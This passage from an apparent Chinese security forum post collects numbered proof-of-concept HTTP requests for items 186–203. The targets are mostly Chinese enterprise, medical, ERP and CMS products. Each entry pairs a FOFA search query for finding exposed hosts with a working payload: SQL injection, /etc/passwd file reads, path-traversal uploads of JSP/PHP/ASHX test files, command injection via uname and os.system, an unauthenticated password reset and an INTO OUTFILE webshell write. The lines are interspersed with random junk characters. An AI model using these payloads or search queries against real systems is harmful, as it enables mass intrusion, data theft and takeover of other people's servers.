1 Q3 s; K% Z' C/ }( Tversion < 7.0.5.1) F# ]) ~. i3 f. {$ C% O
FOFA:app="REALOR-天翼应用虚拟化系统"4 ^! G+ t9 k' Q
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
, w, R, L4 k9 sHost: host! B& E# y. Q. I$ J) D
! f6 n% @( q+ i: U
4 j# w: e/ m4 f8 \4 @. e186. F-logic DataCube3 SQL注入
% K# B* E' h) @; \CVE-2024-31750
& N0 X5 R! y4 _9 G% }" C6 CF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
4 s E2 w. E+ ^6 dFOFA:title=="DataCube3"7 `5 ?, i6 R; b1 [
POST /admin/pr_monitor/getting_index_data.php HTTP/1.12 D$ d0 e* l3 i& ~1 x
Host: your-ip
7 d% @) A- V4 q/ g C( d+ K, O) e5 t" XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.04 y4 z7 R; \" x- d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
1 i# R' B* a: K9 l) W% |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ L. `% D0 L0 D$ h& g6 U
Accept-Encoding: gzip, deflate
4 V5 K0 D( ~8 u" O+ a; `Connection: close! x; K- K3 h: K4 T3 g; F. ~+ j% ~+ y7 E
Content-Type: application/x-www-form-urlencoded
, P* q" M; U: ~) T: L& j2 e# A6 M. J7 @. N* v& U" w2 T% S
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450$ G% Y% H( a3 H' H) Q
, n/ X& F' U3 S/ o. @1 ~
2 u- j! c0 C9 m7 z7 H& A187. Mura CMS processAsyncObject SQL注入
8 @. S# Y6 @" {9 ^CVE-2024-32640! z) h, `9 ]! h% \- d
FOFA:"Mura CMS"
- g; X- O$ B6 L# ?* W2 `POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.16 N# P$ t! ^( V/ g7 \$ Y
Host: your-ip
: g* Q' m9 K iContent-Type: application/x-www-form-urlencoded6 l9 X9 h1 u0 S" B
& p ~! `3 j2 T2 r' r2 h
! K" j: e! @1 F3 X+ ~! A! Fobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
5 i9 s! p/ g% y& D! u% M/ p+ o4 n' O, J9 c) K
' Z8 n; Z- [! C) ?5 w0 C# d
188. 叁体-佳会视频会议 attachment 任意文件读取
1 y+ d4 ]- b+ ?version <= 3.9.7
; E. r B! _- T4 mFOFA:body="/system/get_rtc_user_defined_info?site_id"
1 g1 P. P& W: j& `7 D6 UGET /attachment?file=/etc/passwd HTTP/1.1
5 |1 D! |+ H/ D* X" v2 x# LHost: your-ip
2 S; x. O$ M6 [- ~; Z- E2 C2 e5 C* S) hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, d, x- P' `. d4 @; d! E# N1 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. U2 ]/ z4 W( Q3 w/ {9 m
Accept-Encoding: gzip, deflate% z' g6 e7 k) A8 ~$ |
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
/ `' J$ T. K' I- F. c) GConnection: close# [) j% w3 A% m7 {" M# S
1 i! K( N* j. k% C
! l" @, T1 ]* y% a1 J189. 蓝网科技临床浏览系统 deleteStudy SQL注入
# h; D. ` L1 S2 r( l9 \FOFA:app="LANWON-临床浏览系统"
Y& t" D; g, I$ q, wGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
- T8 S9 s8 l1 M3 HHost: your-ip9 n) r7 j6 B$ \
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 Z: W/ ~, {, X' F, g9 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 g2 i7 h, [8 k; s
Accept-Encoding: gzip, deflate( b! M$ {! m; E3 c% h5 j
Accept-Language: zh-CN,zh;q=0.9
* T+ J6 y$ A) Q. ]* Z8 {$ KConnection: close& a) P0 p+ ?. ^* I0 Y
# E0 ?2 I/ i! r% U$ p
' Z6 b' X& t. p190. 短视频矩阵营销系统 poihuoqu 任意文件读取# k7 p: m8 _ y
FOFA:title=="短视频矩阵营销系统"
, w3 u! j5 Q0 P" O% a' sPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
$ E0 `$ [6 S- {+ wHost: your-ip
: N% [: N# [. {, B4 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
3 Z6 j4 \( l0 s0 U" BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- R2 `) e0 z5 H# s" M
Content-Type: application/x-www-form-urlencoded
9 @& p; Z, m1 V5 |8 |Accept-Encoding: gzip, deflate$ w' K1 ~8 q8 h$ O
Accept-Language: zh-CN,zh;q=0.9
/ \5 r+ h B3 h, o, b8 C! f
( U( K7 }, j. ]" { R* |poi=file:///etc/passwd& c! l9 O. T% L$ [' V
. {& D3 n* p- T2 f6 l. o! M4 E
9 g0 A# I/ ]0 M' Z8 y# `191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入$ y& @/ \6 V: v6 j" q! G, G( N
FOFA:body="/CDGServer3/index.jsp"
2 G$ ^% l- A' j0 K; E* B1 e3 XPOST /CDGServer3/js/../NavigationAjax HTTP/1.1; z- U: m8 d3 q; r2 S+ S+ n
Host: your-ip2 }+ Q3 X( n8 f# b% P( C* t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ N( _. e. U+ n( ^; f0 Q: `Content-Type: application/x-www-form-urlencoded7 R! }2 k. N+ D' g ]% h
5 O8 }( i& i0 w7 W) h; M! n1 [
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
* w6 R" `# U. |3 Y2 o O; u% N5 I9 Z: A$ ~7 x; [' Z ^
, m, I# t- I1 Q$ J) |
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传# Z# e! k/ r" R1 z9 P& X2 n+ A% ~
FOFA:title="用户登录_富通天下外贸ERP"
; R9 Q Q& E6 u: A6 P; k0 EPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1( w8 h4 k& O* d6 J
Host: your-ip
% Y3 e) W4 c6 m6 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
, a z- g1 A6 rContent-Type: application/x-www-form-urlencoded) W+ Y# c: ] e
; ?8 N8 |: D9 b" y, f
, l3 A4 ~- U) T8 i1 R<% @ webhandler language="C#" class="AverageHandler" %>: b8 ^9 @) e1 {
using System;
0 M7 V' E$ L3 r. X9 V5 y3 ~ n( J+ |using System.Web;
; I1 o( Y3 A$ s& R/ ]5 G2 {# n7 Lpublic class AverageHandler : IHttpHandler
6 W! r9 k6 H3 L$ @{. D, g7 `$ @& e! \
public bool IsReusable
+ T) ?: f* A) C0 J3 E7 J{ get { return true; } }2 ?: B6 k! W$ E- ^/ r5 o" L% M
public void ProcessRequest(HttpContext ctx)
8 g2 S8 Y+ Z1 f{) s4 w2 A- ^# l$ J6 a9 j3 S* a* n
ctx.Response.Write("test");
) q. T- }$ S0 c. v) ]2 x4 t}
, U" O" F7 h8 Z2 Z7 |}
: u2 E% ~' q$ ]
$ j% X# r5 j% d* { B2 _9 q! W4 ~0 `2 o0 H, j/ O
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
; W" @* N7 C! ~9 F- O' _2 Y wFOFA:body="山石云鉴主机安全管理系统"$ h: x2 J. l7 e4 G
GET /master/ajaxActions/getTokenAction.php HTTP/1.1 X- ^9 g0 l, j% L h; o! _
Host:
* x: m/ U3 A4 a% K7 T7 E6 F8 |Cookie: PHPSESSID=2333333333333;
3 P6 E) P0 Z& p$ Y+ GContent-Type: application/x-www-form-urlencoded
( m" z" Q' @- E- v( u Z) E# cUser-Agent: Mozilla/5.0
- q& d S/ j! v% {8 i4 l3 |' Z& o' ~, T) b
& R2 X. z# h3 [+ i" |5 S A1 G' dPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
# H* a! d0 i+ b; [* f/ ZHost:
* p# b0 d y, r, t0 E1 }- }User-Agent: Mozilla/5.0) J9 R: H3 r) L; {: W3 \
Accept-Encoding: gzip, deflate9 i3 Y+ \8 X/ e1 [1 J
Accept: */*
M2 t1 t6 [6 \! a# h& W. l5 D6 oConnection: close& R1 f- J0 u5 ?7 [. d/ ?
Cookie: PHPSESSID=2333333333333;) E! l% Q( g9 T; e" ^" `
Content-Type: application/x-www-form-urlencoded2 {& b6 B$ h- ]
Content-Length: 84
) F9 i4 i3 v2 T; Y h4 l
. s; j' M$ s) A; J/ mparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
1 u' R# ~! K. g. d. q1 T% \7 Q4 o0 ]* q! E
, [- K% n1 Z# U
GET /master/img/config HTTP/1.1
& j% v. ]! K' x8 L$ l4 [Host:
g9 W& L9 F" q* e: ^" N- C% L: ?9 rUser-Agent: Mozilla/5.0
/ K% ~9 r8 K2 [; I1 p6 ]1 b% D, w# u) \7 R) P/ M
1 S- E1 a9 D1 g
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传( B, ]7 F% J( B7 }, C- h
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在, ]% b+ [' H- ?! G7 `, o$ ?
: W: S, ~+ n6 i# `6 S4 g$ n4 ]
POST /servlet/uploadAttachmentServlet HTTP/1.1
2 T Q- a7 G, K: B1 PHost: host
1 ]: o a8 F, _/ h7 C0 j1 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
5 |5 g! p: Q6 E" H9 c$ VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* y R* [( ~; u- o; G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. S3 o* _7 e1 A, }Accept-Encoding: gzip, deflate
, E/ M. l) ]6 H' H- dConnection: close' Z+ }5 B. d1 K, x I6 y3 X: c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
, ]7 o4 K$ Q% o: j$ K------WebKitFormBoundaryKNt0t4vBe8cX9rZk
8 t4 n( b5 d2 n9 B" p5 m$ t: H$ G c2 D7 z) x8 [% {8 N
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
1 B* L8 f) j7 h/ UContent-Type: text/plain( x, p# [% g X' E- F9 I
<% out.println("hello");%>, ~! S' `; V* u$ d) v
------WebKitFormBoundaryKNt0t4vBe8cX9rZk; c9 J7 F2 ~5 k" g9 s0 g
Content-Disposition: form-data; name="json"% @% ?1 C0 Y3 R ~0 W! g
{"iq":{"query":{"UpdateType":"mail"}}}
! `. p! b0 Q- \------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
' }8 W. Z. m0 M
6 z) j7 g, H( V" ]% X9 H% P# ?: n3 q' W" f8 t% e
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行5 a6 H; }( f0 v9 j8 q8 g% |
FOFA:title=="飞鱼星企业级智能上网行为管理系统
! t+ A) [( i2 E; H9 @% K! O$ cPOST /send_order.cgi?parameter=operation HTTP/1.1
0 N/ n7 Q, ]6 Y+ ]* o5 N# o) {Host: 127.0.0.17 _4 n3 S0 T, }0 s
Pragma: no-cache C, \3 H/ L, w# T. A
Cache-Control: no-cache* Q8 s" b; w$ w# F6 m$ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
6 v# d! t: f6 W- l _, O0 iAccept: */*
8 V% Q: p( m) xAccept-Encoding: gzip, deflate
' M3 U+ I2 `3 T& @# @Accept-Language: zh-CN,zh;q=0.9
C! `# i. R; F4 eConnection: close1 b8 ]! W/ C9 e
Content-Type: application/x-www-form-urlencoded. A& u$ i8 q9 V) N- T( _" G& y
Content-Length: 688 ~: G. g, e+ P( L- [8 v$ ]: e: g
- Q$ j. J' A6 P- L6 \
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}" ~) N5 g6 X2 s, ^& c
3 u# H" O* B; b* {4 T3 ?
7 X5 d6 t* H" E% w4 U196. 河南省风速科技统一认证平台密码重置$ a& o( P# g7 r
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
3 m- b1 f. ]& X+ v" DPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
: Y7 `$ t' n0 g8 s$ OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36$ Q: M8 R* j! O
Content-Type: application/json;charset=UTF-8
( r+ r4 A) k# `X-Requested-With: XMLHttpRequest0 ^; o: c* \5 |% R! o4 C2 I" ?& h
Host:
' z4 m2 ]9 ~; c6 g4 v" \Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.23 }* P! _/ Z0 `1 t4 E! h/ g
Content-Length: 45: K$ y& s: }) o$ F1 B8 j& _- C
Connection: close; F6 a" Y: V% G) z/ V. b" H
' y2 r" @& r5 \8 P" T
{"xgh":"test","newPass":"test666","email":""}
3 _6 n- ~2 Y, M8 u. i# t* c, v7 c) Q
) w$ O5 d& P. S7 k! Q) n& G7 q8 I( V9 |7 x" ^1 c
. ^( L- D; v- P# i! L
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入8 @+ Y7 [. T; D" |/ A5 N- u' w: e
FOFA:app="浙大恩特客户资源管理系统"
% V+ l/ j, ^6 S2 W+ |2 a/ T- U- UGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.15 d# c4 e! v4 C* P3 C) r
Host:8 X' a$ p; a; w( X# _* N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
, P. b1 N3 Z/ \Accept-Encoding: gzip, deflate) Z6 n! n; g1 G8 V% Z' i4 l+ V" ^
Connection: close
; A$ T9 C% [4 L# Q2 \' x* J- P
" x) ]5 y. A: r2 I" Y- |9 Y
0 p- b( @0 M T6 L
) W/ P! { ^* g0 f3 q0 X198. 阿里云盘 WebDAV 命令注入+ z& E& X' k; U: W. ^. U/ C( y
CVE-2024-29640. o) @4 y, {; B- s$ j1 h- [
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.10 k8 r$ w/ t4 v5 c+ V: @! S0 S1 {) x
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf646 S0 V, V- n0 H- Q- a8 O: ]% l
Accept: */*5 N$ Z0 \ k9 d
Accept-Encoding: gzip, deflate
/ v9 M g3 G( I# N, A8 gAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6% E# G; h; ]* l/ m! c
Connection: close' y0 N* Q- m" z8 A
7 R; I: h* t/ m- y; e; o1 ?
7 J8 m. k+ u& F7 y
199. cockpit系统assetsmanager_upload接口 文件上传8 ]0 V# ?- n% n( ] q
6 @5 L; |2 T9 P: z% n1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
& X0 ~& Z9 a, v& W9 a9 K* b% CGET /auth/login?to=/ HTTP/1.1
+ ~ c8 b8 v8 J& M: `9 r) Q" {" g& \, I* n; q
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw": \: X3 _$ A8 G% H
& E- U* k# ~0 f; m5 ]* F/ S
2.使用刚才上一步获取到的jwt获取cookie:
6 x* N5 H1 W" s* q! l% g. t
# R8 I9 N# G+ M) p9 q/ w& OPOST /auth/check HTTP/1.13 C! ]# \3 I8 t1 B
Content-Type: application/json! n# z4 N6 Y2 x. v; v
* b# L: v% e+ X8 q# m' W; [% u; F{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}5 j( U/ ]! O3 Y8 g& Q4 d6 b
9 _5 Q2 u! i9 x! `, W9 u& [9 o
响应:200,返回值:( ^, V) \* A8 S' K! \, V/ ?
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
# t; o! K# T+ I5 ?* lFofa:title="Authenticate Please!"8 x8 a5 M1 r% S
POST /assetsmanager/upload HTTP/1.1 X* X* I8 M9 C0 V; i- w% ^
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
5 g+ Q' ^' {5 }8 y2 @7 yCookie: mysession=95524f01e238bf51bb60d77ede3bea926 m$ d# A5 R4 |5 V- D' m0 I3 G
6 D7 e2 L7 k% i
-----------------------------36D28FBc36bd6feE7Fb3
7 i+ V7 R/ y, f9 t1 k# H- `Content-Disposition: form-data; name="files[]"; filename="tttt.php"
, ~5 P- [0 G0 {5 K nContent-Type: text/php; Q; g, |$ e8 ]
7 M" G- B, W1 [' P/ L<?php echo "tttt";unlink(__FILE__);?>
% Q7 j4 o, d# c/ _-----------------------------36D28FBc36bd6feE7Fb3
# o4 q3 { u8 T/ f3 A `Content-Disposition: form-data; name="folder"
$ x o9 s9 S" Y; [& i* c5 m4 Q# I2 Z8 r: l4 h
-----------------------------36D28FBc36bd6feE7Fb3--6 M4 o0 N' k. K7 n
& g# `# T* t( V2 A7 @* f# r4 ]+ m) ~ P2 q& a6 `4 ^
/storage/uploads/tttt.php6 N1 k9 M& i5 }( b
% Z0 i3 d: @4 j D+ t% `
200. SeaCMS海洋影视管理系统dmku SQL注入0 G/ o1 I6 V) L3 J
FOFA:app="海洋CMS"& Q' a; g2 n. N
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1/ D) c$ _$ z& |+ W8 x+ {+ w/ H
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s! K/ L9 H: X6 t) S3 q+ K3 u" H
Upgrade-Insecure-Requests: 1) ^* D% I! [8 I, s' [/ ~
Cache-Control: max-age=05 I2 c3 A; z- P$ _ ], G/ E) B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% f: G! b1 X1 Q( @& n+ Q% [
Accept-Encoding: gzip, deflate
; c! u8 ?: K6 `5 _- ^$ A0 X4 U- vAccept-Language: zh-CN,zh;q=0.9
* u5 b1 ]( l% l' T3 m$ x/ w! O
& j( ~( H& U' M* N: L- T201. 方正全媒体新闻采编系统 binary SQL注入! d% f' D' f/ O3 q$ Y) ?/ Y" J
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"$ f9 n0 G [8 W4 ~5 ?2 a/ V
POST /newsedit/newsplan/task/binary.do HTTP/1.1
! i0 V1 ~) a# X: SContent-Type: application/x-www-form-urlencoded$ l1 f, n- p, O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 }- G1 M$ g$ ~- Q% J& p+ f
Accept-Encoding: gzip, deflate
+ d3 k a' W" N" l& pAccept-Language: zh-CN,zh;q=0.9' k" h) [0 r: I4 [0 E, ?
Connection: close
9 `' V+ W. ^# R- P
$ I: m4 h$ M" {1 q% {8 H' n$ ATableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
8 ^# d7 t% u0 b1 W+ F, l! c
: L, Y& k# r' F. S) P _/ W
0 }1 A4 Y* o, M v202. 微擎系统 AccountEdit任意文件上传- A/ P0 Z2 T1 K/ }& g
FOFA:body="/Widgets/WidgetCollection/"
, P9 _$ e: m; \/ z8 J9 t获取__VIEWSTATE和__EVENTVALIDATION值
) n0 w5 X# T2 C! q$ v/ } F8 YGET /User/AccountEdit.aspx HTTP/1.1
. ~$ v$ g7 \- J- K3 pHost: 滑板人之家
, L. v; ?; m) R0 j* aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31* Z/ k. e# E- p1 l" h* p
Content-Length: 0
& Z4 u; G5 k0 T8 x1 P: b
0 x! l' F* _! c: G5 b6 h& R; t! e/ K8 U0 u* y4 @
替换__VIEWSTATE和__EVENTVALIDATION值. S, h4 B7 r0 C: O6 i
POST /User/AccountEdit.aspx HTTP/1.1+ y; N3 Y4 c3 p9 M# P( W
Accept-Encoding: gzip, deflate, br+ b b1 W4 u$ ^1 q0 ]1 A! M
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
1 R& F& r8 \7 P: D+ p. Y8 g% A: O9 w) j3 Y, O% ]2 j8 ^
-----------------------------786435874t38587593865736587346567358735687
6 J4 q# b+ S8 Y7 U- g( P5 ]' Y# XContent-Disposition: form-data; name="__VIEWSTATE"
1 g' {5 R9 N# U# G! u! X' f' ?8 l3 z2 U, b& l! p1 S' n
__VIEWSTATE* Q: S5 y( _7 H, I( _
-----------------------------786435874t38587593865736587346567358735687
1 X. D3 V/ U* r: Q% q! M: R" bContent-Disposition: form-data; name="__EVENTVALIDATION"
5 b* J# i. H* q8 c S
: `" U6 z7 x# Z8 M__EVENTVALIDATION
; R* m! V2 Q* q-----------------------------786435874t38587593865736587346567358735687% t7 [' f: J9 s# W; O
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
5 j( t' S3 q) ?( `; AContent-Type: text/plain
f( Y" c$ ^: m; }" _1 n% X
0 l9 ]; }1 C3 i4 k/ v) {3 jHello World!
( h0 w* e. c6 B- o/ o) [-----------------------------786435874t385875938657365873465673587356872 U# v# H1 k1 w6 [* j* V
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"$ _4 s2 A( p0 {$ A! \
@; e# p2 J: V7 M3 p
上传图片9 c$ w6 c$ _' v& x" ^# Z' h* r$ Q
-----------------------------786435874t38587593865736587346567358735687
" ^1 H. k$ P) KContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"4 E6 }# `4 p* q$ e; s( w$ Z7 Y4 [
+ [4 \+ k) z( I# k
6 H8 w+ L. y. M& x( P/ `" e-----------------------------786435874t38587593865736587346567358735687
3 [- c' {( k$ o& H- Y3 ~ u# zContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"; t" C2 j$ Y! Y& R3 v) q0 [+ G
2 W0 V7 G5 Y. E- \
9 A" b+ a& D, a. O-----------------------------786435874t38587593865736587346567358735687--2 r7 \9 n5 w3 `
( d: w& T: }# G, [6 P9 t5 n
# u; z n$ |/ _' a1 P& Y3 @' v- q/_data/Uploads/1123.txt) I% N1 ]2 P1 p6 ?4 d4 y
, c2 O& g) a! p2 z" n/ z+ ?203. 红海云EHR PtFjk 文件上传
# r8 ~3 m0 B3 ?/ _& BFOFA:body="RedseaPlatform"" \- Y' h9 i; J4 s# U
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
1 _; d" K& X2 t' w I4 h+ s3 wHost: x.x.x.x
- z }( i2 A% R" cAccept-Encoding: gzip$ v$ L/ M1 h+ H" \, M ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 Q7 H" J/ r2 \: C/ m5 f( Z8 ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
$ E. M: Z3 w; m f v% }1 NContent-Length: 210
G& }( I9 c8 R2 e9 ?. R7 Z$ c
* p& B/ e4 Q' p7 M- l4 \6 @$ A3 l------WebKitFormBoundaryt7WbDl1tXogoZys4
0 N2 L' O( H# P2 Q8 Q' O/ fContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
; Z) h( x Q F# X. l+ T6 JContent-Type:image/jpeg
! u% _4 A( T$ |/ x& q1 }5 f
! g2 w1 o1 f7 w6 M( _9 d' U3 n- _7 f<% out.print("hello,eHR");%>) ?) C; j; M% ]. A
------WebKitFormBoundaryt7WbDl1tXogoZys4--
, W7 _( ~* S6 j9 c' Q* X/ Q! C
: X6 W8 L3 Z' v. }2 s
% @" j( I/ G; J) l h1 A
; F7 J: Q1 \2 @# A R9 M$ q2 ]* z1 C7 Q# {' e3 j2 L
. T& O# `- i$ M' f2 b9 x
% K8 S9 p9 j/ Z! V% y$ D |
发表于 2024-6-5 14:31:29
收藏
支持
反对